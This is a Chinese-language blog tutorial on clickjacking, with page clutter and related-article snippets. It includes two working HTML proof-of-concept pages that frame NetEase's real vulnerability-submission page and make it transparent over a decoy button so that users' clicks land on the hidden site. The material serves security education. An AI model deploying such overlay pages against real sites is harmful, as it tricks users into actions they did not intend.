点击劫持

最新推荐文章于 2024-09-08 10:00:08 发布
最新推荐文章于 2024-09-08 10:00:08 发布
阅读量495 收藏
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88123673
版权

一、前置知识

首先介绍下html下的iframe标签的作用:
可以创建包含另一个文档的内联框架。
例如下面这个代码。运行下面这个网页,发现他和网易安全中心的页面几乎一样,除了url不一样

<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<head>
	<title>网易安全中心</title>
	<style >
		html,body,iframe{
			display: block;
			height: 100%;
			width: 100%;
			margin: 0;
			padding: 0;	
			border: none;	
		}
	</style>
</head>
<body>
	<iframe src="http://aq.163.com/module/hole/hole-submit.html"></iframe>
</body>
</html>

在这里插入图片描述
案例,图片的背后是隐藏的网站。
在这里插入图片描述

二、什么是点击劫持呢

通过覆盖不可见的框架误导受害者点击而造成的攻击行为。

三、点击劫持的特点

1、隐蔽性高

2、骗取用户操作

3、UI-覆盖攻击

4、利用了iframe标签或者其他标签的属性

四、实例分析

代码如下,效果如下

<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<head>
	<title>点击劫持</title>
	<style >
	/*设置高度、宽度*/
		html,body,iframe{
    			display: block;
    			height: 100%;
    			width: 100%;
    			margin: 0;
    			padding: 0;	
    			border: none;
    			}
    /*设置隐藏网页的可见度*/
    	iframe{
    		/*opacity: 0;*/
    		filter: alpha(opacity=0);/*IE*/
    		-moz-opacity:0.5;/*Moz+FF*/
    		opacity: 0.5;/*支持css3浏览器(FF1.5也支持)*/
    		position: absolute;
    		z-index: 2;/*网页的堆叠层次*/
    	}
    /*设置按钮的位置*/
    	button{
    		position: absolute;
    		top: -70px;
    		left: 800px;
    		z-index: 1;
    		width: 72px;
    		height: 26px;
    	}	
	</style>
</head>
<body>
	<button><img src="3.jpg"></button>
	<iframe src="http://aq.163.com/module/hole/hole-submit.html"></iframe>
</body>
</html>

在这里插入图片描述
再做次修改
在这里插入图片描述
效果,以及完全看不出背后的网易网页了。
在这里插入图片描述

giunwr
关注
专栏目录
点击劫持漏洞案例ppt
01-02
点击劫持---clickjacking
Web安全之点击劫持(ClickJacking)
weixin_33871366的博客
03-06 997
点击劫持(ClickJacking)是一种视觉上的欺骗手段。大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面;二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义; iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让别人关注它。于是我们准备一个页面: &l...
点击劫持(Clickjacking)
最新发布
2302_76189356的博客
09-08 369
点击劫持是一种欺骗性攻击,攻击者通过将一个不可见或伪装的iframe覆盖在一个网页上,是一种视觉上的欺骗手段攻击者诱惑用户在该网页上进行操作,在用户不知情的情况下点击透明的iframe页面从而使受害者无意中执行了攻击者希望的操作。
点击劫持(clickjacking)
内心不种满鲜花就会长满杂草
03-27 5282
目录 一. 漏洞描述 二. 点击劫持例子 三. 漏洞防御 一. 漏洞描述 点击劫持, clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由 互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。它是通过覆盖不可见的框架误导受害者点击。 虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。 这种攻击利用了HTML中<iframe>标签的透明属性。iframe标签是一个...
点击劫持 小例
weixin_33859504的博客
10-16 455
点击劫持(UI-覆盖攻击/click jacking) 一个关于点击劫持的小示例,首相看下理论知识 项目思路 首先,制作一个功能页面,作为被iframe嵌套的功能页面;这个页面的功能就是模仿投票功能,点击按钮时,即可完成投票功能,控制台会同步打印出操作信息。 <!DOCTYPE html> <html lang="en"> <head> <meta ...
点击劫持页面.rar
05-28
这个"点击劫持页面.rar"文件提供了一个静态页面示例,用于演示这种攻击方式,帮助我们理解和防范点击劫持。 首先,我们需要理解点击劫持的工作原理。攻击者通常会创建一个包含恶意iframe的网页,这个iframe的源URL...
Lab5:点击劫持
02-16
点击劫持示例-Python 建立例子 克隆这个git仓库 运行docker-compose build && docker-compose up注意,第一次可能要花几分钟。 由于docker将缓存php容器使用的软件包,因此在后续执行中将更快。 打开浏览器并导航到...
clickjackingpoc:点击劫持攻击的概念证明
05-24
点击劫持PoC 旨在使您的点击劫持事件变得更好,更轻松的工具。 更新 现在,在服务器日志中捕获信誉,并添加一条消息,要求提供赏金! 概述 一种基于Web的ClickJacking PoC工具。 跑步 确保您已安装php(默认安装在...
WEB应用程序点击劫持漏洞研究及防御方法
12-11
web程序劫持漏洞及防御的方法。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
(四)Clickjacking-点击劫持
weixin_43047908的博客
04-05 325
什么是点击劫持 Clickjacking是一种基于界面的攻击,其中,通过诱骗用户单击诱饵网站中的某些其他内容,诱骗用户单击隐藏网站上的可操作内容。 考虑以下示例: 网络用户访问诱饵网站(也许这是电子邮件提供的链接),然后单击按钮以赢取奖金。不知不觉中,它们已被攻击者欺骗,诱使他们按下了其他隐藏按钮,从而导致了另一个站点上的帐户付款。这是一个点击劫持攻击的示例。该技术取决于在iframe中包含按钮或隐藏链接的不可见,可操作的网页(或多个页面)的合并。iframe覆盖在用户预期的诱饵网页内容之上。 此攻击与CS
【Web安全】点击劫持 Click Jacking
RexHa的博客
10-16 1080
点击劫持是一种视觉上的欺骗手段。攻击者用一个透明的、不可见的iframe,覆盖在一个网页上,诱使用户在该网页上进行操作,使用户在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以使用户恰好点击在iframe的一些功能性按钮上。通俗的讲,就是你在点击一个“网页”的某个位置时,很可能是点击了隐藏在页面下的某个按钮,从而达到了黑客的某些目的,这对用户来说是不可见的。相对于XSS和CSRF,需要与用户进行交互,实施攻击的成本较高,在网络犯罪中比较少见。
点击劫持(ClickJacking)
热门推荐
qq_56327824的博客
03-30 1万+
点击劫持(ClickJacking) 什么是点击劫持 点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的,不可见的iframe,覆盖在一个网页上,然后诱导使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱导用户恰巧点击在iframe页面的一些功能性按键上 不懂iframe是干什么的同学,自己补充一下 利用iframe <!DOCTYPE html> <html lang="en"> <head>
PortSwigger 点击劫持(Clickjacking)
weixin_42451330的博客
03-02 756
本文介绍PortSwigger靶场 点击劫持 (Clickjacking)漏洞,包括Clickjacking介绍、利用方式、防御方式等。如有疑问欢迎私聊。
web安全——点击劫持(ClickJacking)
Spontaneous_0的博客
01-15 759
web安全——点击劫持(ClickJacking)
点击劫持:原理、案例与防御策略
点击劫持漏洞案例ppt深入解析 点击劫持,又称clickjacking或UI-覆盖攻击,起源于2008年,由罗伯特·汉森和耶利米·格劳斯曼首次提出。这是一种网络攻击手段,攻击者通过利用HTML中的标签的透明特性,创建一个不可见...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值